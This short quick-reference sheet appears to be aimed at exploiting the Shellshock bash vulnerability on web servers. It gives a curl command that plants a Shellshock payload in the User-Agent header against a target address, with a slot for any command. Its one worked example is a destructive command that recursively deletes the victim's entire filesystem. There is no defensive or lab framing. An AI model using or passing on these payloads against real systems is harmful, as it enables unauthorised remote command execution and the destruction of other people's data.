Exploiting Shell Shock - Quick Reference
There's a really good CloudFlare article on Shellshock here.
curl -H "User-Agent: () { :; }; <command>" http://TARGET_IP/
Replace <command>
with the command you want to execute on the victim machine.
For example:
curl -H "User-Agent: () { :; }; /bin/rm -rf / --no-preserve-root" http://TARGET_IP/